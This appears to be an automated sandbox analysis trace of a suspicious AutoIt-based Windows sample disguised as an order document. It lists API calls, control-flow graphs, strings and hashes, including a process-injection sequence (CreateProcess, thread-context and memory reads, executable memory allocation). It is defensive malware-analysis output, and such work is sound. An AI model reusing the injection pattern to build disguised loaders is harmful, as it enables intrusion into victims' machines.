                      • GetSysColorBrush.USER32(0000000F), ref: 00983074
                      • RegisterClassExW.USER32(00000030), ref: 0098309E
                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009830AF
                      • InitCommonControlsEx.COMCTL32(?), ref: 009830CC
                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009830DC
                      • LoadIconW.USER32(000000A9), ref: 009830F2
                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00983101
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                      • API String ID: 2914291525-1005189915
                      • Opcode ID: 6ed0e1c5daee0e67da03718ec9098d93cb7f9a9d7ed6bf9bd22fd218a64446e8
                      • Instruction ID: 212c3ef02ffb662633f63410b5f13f02cb7eedb34c21c3166cf3fd4911dc635c
                      • Opcode Fuzzy Hash: 6ed0e1c5daee0e67da03718ec9098d93cb7f9a9d7ed6bf9bd22fd218a64446e8
                      • Instruction Fuzzy Hash: A621B4B9900318AFDB10DFE4E849BDDBBF4FB0A700F00412AF910A66A0D7B245468F92

                      Control-flow Graph

                      APIs
                        • Part of subcall function 00984864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00A462F8,?,009837C0,?), ref: 00984882
                        • Part of subcall function 009A074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,009872C5), ref: 009A0771
                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00987308
                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 009BECF1
                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 009BED32
                      • RegCloseKey.ADVAPI32(?), ref: 009BED70
                      • _wcscat.LIBCMT ref: 009BEDC9
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                      • API String ID: 2673923337-2727554177
                      • Opcode ID: ab002d0a97ced3e63cebf681eab8ae0d67dee93898ef62bbdf75cf67a40825f5
                      • Instruction ID: 4895236734ca42062f52b6ed4cdce190f318d5e587c8ea2440790221a0a501c9
                      • Opcode Fuzzy Hash: ab002d0a97ced3e63cebf681eab8ae0d67dee93898ef62bbdf75cf67a40825f5
                      • Instruction Fuzzy Hash: 8E717B794083419EC314EFA5EC81ADFBBE8BFC6750B50492EF445932A0EBB1D949CB91

                      Control-flow Graph

                      APIs
                      • GetSysColorBrush.USER32(0000000F), ref: 00983A62
                      • LoadCursorW.USER32(00000000,00007F00), ref: 00983A71
                      • LoadIconW.USER32(00000063), ref: 00983A88
                      • LoadIconW.USER32(000000A4), ref: 00983A9A
                      • LoadIconW.USER32(000000A2), ref: 00983AAC
                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00983AD2
                      • RegisterClassExW.USER32(?), ref: 00983B28
                        • Part of subcall function 00983041: GetSysColorBrush.USER32(0000000F), ref: 00983074
                        • Part of subcall function 00983041: RegisterClassExW.USER32(00000030), ref: 0098309E
                        • Part of subcall function 00983041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009830AF
                        • Part of subcall function 00983041: InitCommonControlsEx.COMCTL32(?), ref: 009830CC
                        • Part of subcall function 00983041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009830DC
                        • Part of subcall function 00983041: LoadIconW.USER32(000000A9), ref: 009830F2
                        • Part of subcall function 00983041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00983101
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                      • String ID: #$0$AutoIt v3
                      • API String ID: 423443420-4155596026
                      • Opcode ID: bc76a8acf56cd7f2e64f66e7b9720ff3acca6f4c3abed760485d8d3f1c37d73b
                      • Instruction ID: 1dcd6e5937c3aa3ee7c67f16d4e34932f2d223d5221b4f191c12db0d0cf2bfb9
                      • Opcode Fuzzy Hash: bc76a8acf56cd7f2e64f66e7b9720ff3acca6f4c3abed760485d8d3f1c37d73b
                      • Instruction Fuzzy Hash: 10210AB9D00308FFEB10DFE4EC09BDD7BB5EB4A711F004129E504A62A0D3B655568F56

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 767 983633-983681 769 9836e1-9836e3 767->769 770 983683-983686 767->770 769->770 773 9836e5 769->773 771 983688-98368f 770->771 772 9836e7 770->772 774 98375d-983765 PostQuitMessage 771->774 775 983695-98369a 771->775 777 9836ed-9836f0 772->777 778 9bd31c-9bd34a call 9911d0 call 9911f3 772->778 776 9836ca-9836d2 DefWindowProcW 773->776 783 983711-983713 774->783 779 9bd38f-9bd3a3 call 9e2a16 775->779 780 9836a0-9836a2 775->780 782 9836d8-9836de 776->782 784 9836f2-9836f3 777->784 785 983715-98373c SetTimer RegisterWindowMessageW 777->785 813 9bd34f-9bd356 778->813 779->783 805 9bd3a9 779->805 786 9836a8-9836ad 780->786 787 983767-983776 call 984531 780->787 783->782 791 9836f9-98370c KillTimer call 9844cb call 983114 784->791 792 9bd2bf-9bd2c2 784->792 785->783 788 98373e-983749 CreatePopupMenu 785->788 793 9836b3-9836b8 786->793 794 9bd374-9bd37b 786->794 787->783 788->783 791->783 798 9bd2f8-9bd317 MoveWindow 792->798 799 9bd2c4-9bd2c6 792->799 803 98374b-98375b call 9845df 793->803 804 9836be-9836c4 793->804 794->776 802 9bd381-9bd38a call 9d817e 794->802 798->783 808 9bd2c8-9bd2cb 799->808 809 9bd2e7-9bd2f3 SetFocus 799->809 802->776 803->783 804->776 804->813 805->776 808->804 814 9bd2d1-9bd2e2 call 9911d0 808->814 809->783 813->776 818 9bd35c-9bd36f call 9844cb call 9843db 813->818 814->783 818->776
                      APIs
                      • DefWindowProcW.USER32(?,?,?,?), ref: 009836D2
                      • KillTimer.USER32(?,00000001), ref: 009836FC
                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0098371F
                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0098372A
                      • CreatePopupMenu.USER32 ref: 0098373E
                      • PostQuitMessage.USER32(00000000), ref: 0098375F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                      • String ID: TaskbarCreated
                      • API String ID: 129472671-2362178303
                      • Opcode ID: c853eb92781bedc7a6589e8b49ccb913ba526b3305fcc812f6555ed67869a141
                      • Instruction ID: fd2efff028fc64f6df0717c6a0c0ba23b209c2f8bb6cd7c01ef7a084aa990c71
                      • Opcode Fuzzy Hash: c853eb92781bedc7a6589e8b49ccb913ba526b3305fcc812f6555ed67869a141
                      • Instruction Fuzzy Hash: 9E4141B9104145BBDF24BF7CDC0ABBD3758FB82700F144529F501963A1EAA6DD069763

                      Control-flow Graph

                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                      • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                      • API String ID: 1825951767-3513169116
                      • Opcode ID: 6b084727c6480913a8505d3b86c5e71f5bc97853dc952b81aa136826c7b3c313
                      • Instruction ID: 39ab474fad52954f3c4269f4d139e4db404954b1f0850d9aed93e2d765d1f639
                      • Opcode Fuzzy Hash: 6b084727c6480913a8505d3b86c5e71f5bc97853dc952b81aa136826c7b3c313
                      • Instruction Fuzzy Hash: 67A15C75D1022DAACB04FBA0CC95EEEB778BF95700F544429F412B7291EF759A09CBA0

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 942 2222610-22226be call 2220000 945 22226c5-22226eb call 2223520 CreateFileW 942->945 948 22226f2-2222702 945->948 949 22226ed 945->949 954 2222704 948->954 955 2222709-2222723 VirtualAlloc 948->955 950 222283d-2222841 949->950 952 2222883-2222886 950->952 953 2222843-2222847 950->953 956 2222889-2222890 952->956 957 2222853-2222857 953->957 958 2222849-222284c 953->958 954->950 959 2222725 955->959 960 222272a-2222741 ReadFile 955->960 961 2222892-222289d 956->961 962 22228e5-22228fa 956->962 963 2222867-222286b 957->963 964 2222859-2222863 957->964 958->957 959->950 969 2222743 960->969 970 2222748-2222788 VirtualAlloc 960->970 971 22228a1-22228ad 961->971 972 222289f 961->972 965 222290a-2222912 962->965 966 22228fc-2222907 VirtualFree 962->966 967 222287b 963->967 968 222286d-2222877 963->968 964->963 966->965 967->952 968->967 969->950 973 222278a 970->973 974 222278f-22227aa call 2223770 970->974 975 22228c1-22228cd 971->975 976 22228af-22228bf 971->976 972->962 973->950 982 22227b5-22227bf 974->982 979 22228da-22228e0 975->979 980 22228cf-22228d8 975->980 978 22228e3 976->978 978->956 979->978 980->978 983 22227f2-2222806 call 2223580 982->983 984 22227c1-22227f0 call 2223770 982->984 990 222280a-222280e 983->990 991 2222808 983->991 984->982 992 2222810-2222814 FindCloseChangeNotification 990->992 993 222281a-222281e 990->993 991->950 992->993 994 2222820-222282b VirtualFree 993->994 995 222282e-2222837 993->995 994->995 995->945 995->950
                      APIs
                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 022226E1
                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 02222907
                      Memory Dump Source
                      • Source File: 00000000.00000002.1692712668.0000000002220000.00000040.00001000.00020000.00000000.sdmp, Offset: 02220000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2220000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: CreateFileFreeVirtual
                      • String ID:
                      • API String ID: 204039940-0
                      • Opcode ID: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                      • Instruction ID: 9918080aca3c5c7b1c4c8d25f9fba66f53a0704f72959b2998985da2bed77c95
                      • Opcode Fuzzy Hash: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                      • Instruction Fuzzy Hash: 2DA11674E10219EBDB14CFE4C894BEEB7B5BF48304F208259E501BB284D77A9A44CFA5

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1073 9839e7-983a57 CreateWindowExW * 2 ShowWindow * 2
                      APIs
                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00983A15
                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00983A36
                      • ShowWindow.USER32(00000000,?,?), ref: 00983A4A
                      • ShowWindow.USER32(00000000,?,?), ref: 00983A53
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Window$CreateShow
                      • String ID: AutoIt v3$edit
                      • API String ID: 1584632944-3779509399
                      • Opcode ID: 2226028247f9884f39ebab28b0832f9b94014121cacab3c0e06becdd5cc278b4
                      • Instruction ID: 096cae269cfe100d7892706f54f061461750b2297fb95e184a90994763664074
                      • Opcode Fuzzy Hash: 2226028247f9884f39ebab28b0832f9b94014121cacab3c0e06becdd5cc278b4
                      • Instruction Fuzzy Hash: 80F030B8A402947EEB3197976C08EA73E7DE7C7F50B000029B900A21B0C1E60802CA71

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1074 22223b0-2222504 call 2220000 call 22222a0 CreateFileW 1081 2222506 1074->1081 1082 222250b-222251b 1074->1082 1083 22225bb-22225c0 1081->1083 1085 2222522-222253c VirtualAlloc 1082->1085 1086 222251d 1082->1086 1087 2222540-2222557 ReadFile 1085->1087 1088 222253e 1085->1088 1086->1083 1089 222255b-2222595 call 22222e0 call 22212a0 1087->1089 1090 2222559 1087->1090 1088->1083 1095 22225b1-22225b9 ExitProcess 1089->1095 1096 2222597-22225ac call 2222330 1089->1096 1090->1083 1095->1083 1096->1095
                      APIs
                        • Part of subcall function 022222A0: Sleep.KERNELBASE(000001F4), ref: 022222B1
                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 022224FA
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1692712668.0000000002220000.00000040.00001000.00020000.00000000.sdmp, Offset: 02220000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2220000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: CreateFileSleep
                      • String ID: YR89F8H6AH97VJC2N3IJNJNB
                      • API String ID: 2694422964-127585616
                      • Opcode ID: d66fb3e19efb85c3c532558a0a0801c3a86f686cda584bdd5d7034692819929e
                      • Instruction ID: dcfe323a6f534ffc1d1772812b7a140a44959c46a74b103fbef0c62bfe80b1d2
                      • Opcode Fuzzy Hash: d66fb3e19efb85c3c532558a0a0801c3a86f686cda584bdd5d7034692819929e
                      • Instruction Fuzzy Hash: 8F61A470D14258EBEF11DBE4C854BEEBBB9AF15300F008199E6487B2C1D7BA0B49CB65

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1098 98410d-984123 1099 984129-98413e call 987b76 1098->1099 1100 984200-984204 1098->1100 1103 9bd5dd-9bd5ec LoadStringW 1099->1103 1104 984144-984164 call 987d2c 1099->1104 1107 9bd5f7-9bd60f call 987c8e call 987143 1103->1107 1104->1107 1108 98416a-98416e 1104->1108 1116 98417e-9841fb call 9a3020 call 98463e call 9a2ffc Shell_NotifyIconW call 985a64 1107->1116 1120 9bd615-9bd633 call 987e0b call 987143 call 987e0b 1107->1120 1110 984174-984179 call 987c8e 1108->1110 1111 984205-98420e call 9881a7 1108->1111 1110->1116 1111->1116 1116->1100 1120->1116
                      APIs
                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 009BD5EC
                        • Part of subcall function 00987D2C: _memmove.LIBCMT ref: 00987D66
                      • _memset.LIBCMT ref: 0098418D
                      • _wcscpy.LIBCMT ref: 009841E1
                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 009841F1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                      • String ID: Line:
                      • API String ID: 3942752672-1585850449
                      • Opcode ID: cd77fc38c2d83ba6fa385812b5a26ed56375c0d1485bc4c5b90fad36368692dc
                      • Instruction ID: 14c387ad10bd74b6d70bd12e24c69c30e356b874c79c56b862e76bac93c26406
                      • Opcode Fuzzy Hash: cd77fc38c2d83ba6fa385812b5a26ed56375c0d1485bc4c5b90fad36368692dc
                      • Instruction Fuzzy Hash: 5931D37140C3056AD721FBA0DC45FDBB7ECAF96300F10491AF185922A1EBB4A649C793

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1133 9a564d-9a5666 1134 9a5668-9a566d 1133->1134 1135 9a5683 1133->1135 1134->1135 1137 9a566f-9a5671 1134->1137 1136 9a5685-9a568b 1135->1136 1138 9a568c-9a5691 1137->1138 1139 9a5673-9a5678 call 9a8d68 1137->1139 1141 9a569f-9a56a3 1138->1141 1142 9a5693-9a569d 1138->1142 1149 9a567e call 9a8ff6 1139->1149 1145 9a56b3-9a56b5 1141->1145 1146 9a56a5-9a56b0 call 9a3020 1141->1146 1142->1141 1144 9a56c3-9a56d2 1142->1144 1147 9a56d9 1144->1147 1148 9a56d4-9a56d7 1144->1148 1145->1139 1151 9a56b7-9a56c1 1145->1151 1146->1145 1152 9a56de-9a56e3 1147->1152 1148->1152 1149->1135 1151->1139 1151->1144 1155 9a56e9-9a56f0 1152->1155 1156 9a57cc-9a57cf 1152->1156 1157 9a56f2-9a56fa 1155->1157 1158 9a5731-9a5733 1155->1158 1156->1136 1157->1158 1159 9a56fc 1157->1159 1160 9a579d-9a579e call 9b0df7 1158->1160 1161 9a5735-9a5737 1158->1161 1162 9a57fa 1159->1162 1163 9a5702-9a5704 1159->1163 1172 9a57a3-9a57a7 1160->1172 1165 9a575b-9a5766 1161->1165 1166 9a5739-9a5741 1161->1166 1171 9a57fe-9a5807 1162->1171 1169 9a570b-9a5710 1163->1169 1170 9a5706-9a5708 1163->1170 1167 9a576a-9a576d 1165->1167 1168 9a5768 1165->1168 1173 9a5743-9a574f 1166->1173 1174 9a5751-9a5755 1166->1174 1177 9a576f-9a577b call 9a4916 call 9b10ab 1167->1177 1178 9a57d4-9a57d8 1167->1178 1168->1167 1169->1178 1179 9a5716-9a572f call 9b0f18 1169->1179 1170->1169 1171->1136 1172->1171 1175 9a57a9-9a57ae 1172->1175 1176 9a5757-9a5759 1173->1176 1174->1176 1175->1178 1180 9a57b0-9a57c1 1175->1180 1176->1167 1194 9a5780-9a5785 1177->1194 1181 9a57ea-9a57f5 call 9a8d68 1178->1181 1182 9a57da-9a57e7 call 9a3020 1178->1182 1193 9a5792-9a579b 1179->1193 1185 9a57c4-9a57c6 1180->1185 1181->1149 1182->1181 1185->1155 1185->1156 1193->1185 1195 9a578b-9a578e 1194->1195 1196 9a580c-9a5810 1194->1196 1195->1162 1197 9a5790 1195->1197 1196->1171 1197->1193
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                      • String ID:
                      • API String ID: 1559183368-0
                      • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                      • Instruction ID: 082d7e315f56baee4b61dee65485b2cc3fedf2006e4a7646c99e66d8ca30ca51
                      • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                      • Instruction Fuzzy Hash: EE51A271B00B05DBDB249FB9C88466EB7A9EF42324F668729F825A62D0D7749D508BC0
                      APIs
                        • Part of subcall function 00984F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00A462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00984F6F
                      • _free.LIBCMT ref: 009BE68C
                      • _free.LIBCMT ref: 009BE6D3
                        • Part of subcall function 00986BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00986D0D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: _free$CurrentDirectoryLibraryLoad
                      • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                      • API String ID: 2861923089-1757145024
                      • Opcode ID: e12f1dfd75b93bb28619421c42debfa21c922fdbf9096d924ba327919fab9f83
                      • Instruction ID: 666a4da2c4b458c65985f7d39430fc267f3652b50441f7fc51c5fca73f75a4b1
                      • Opcode Fuzzy Hash: e12f1dfd75b93bb28619421c42debfa21c922fdbf9096d924ba327919fab9f83
                      • Instruction Fuzzy Hash: 55917C71910219EFCF14EFA4C991AEDB7B9FF59314F14442AF816AB2A1EB34AD04CB50
                      APIs
                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,009835A1,SwapMouseButtons,00000004,?), ref: 009835D4
                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,009835A1,SwapMouseButtons,00000004,?,?,?,?,00982754), ref: 009835F5
                      • RegCloseKey.KERNELBASE(00000000,?,?,009835A1,SwapMouseButtons,00000004,?,?,?,?,00982754), ref: 00983617
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: CloseOpenQueryValue
                      • String ID: Control Panel\Mouse
                      • API String ID: 3677997916-824357125
                      • Opcode ID: cc4bc8c193af456e6db1a38d2a9e24b234382e7eb8fa9d1cd0d5b3e07a75e274
                      • Instruction ID: 07ff0d10f017a8730f2d581b7c48ed035a49bc7e215d34e7fa71c65562b48e52
                      • Opcode Fuzzy Hash: cc4bc8c193af456e6db1a38d2a9e24b234382e7eb8fa9d1cd0d5b3e07a75e274
                      • Instruction Fuzzy Hash: 6D114571610208BFDB20DFA9DC81AAEBBBCEF04B40F008469E805E7310E2719E419BA0
                      APIs
                      • CreateProcessW.KERNELBASE(?,00000000), ref: 02221A5B
                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 02221AF1
                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02221B13
                      Memory Dump Source
                      • Source File: 00000000.00000002.1692712668.0000000002220000.00000040.00001000.00020000.00000000.sdmp, Offset: 02220000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2220000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                      • String ID:
                      • API String ID: 2438371351-0
                      • Opcode ID: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
                      • Instruction ID: b5b2b8fe8f8d92c956214ffb60875cf8d20a81806f8cfc30486015aed6bff859
                      • Opcode Fuzzy Hash: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
                      • Instruction Fuzzy Hash: 30621E30A24258DBEB24CFA4C840BDEB372EF58300F1091A9D10DEB395E7769E95CB59
                      APIs
                        • Part of subcall function 00985045: _fseek.LIBCMT ref: 0098505D
                        • Part of subcall function 009E99BE: _wcscmp.LIBCMT ref: 009E9AAE
                        • Part of subcall function 009E99BE: _wcscmp.LIBCMT ref: 009E9AC1
                      • _free.LIBCMT ref: 009E992C
                      • _free.LIBCMT ref: 009E9933
                      • _free.LIBCMT ref: 009E999E
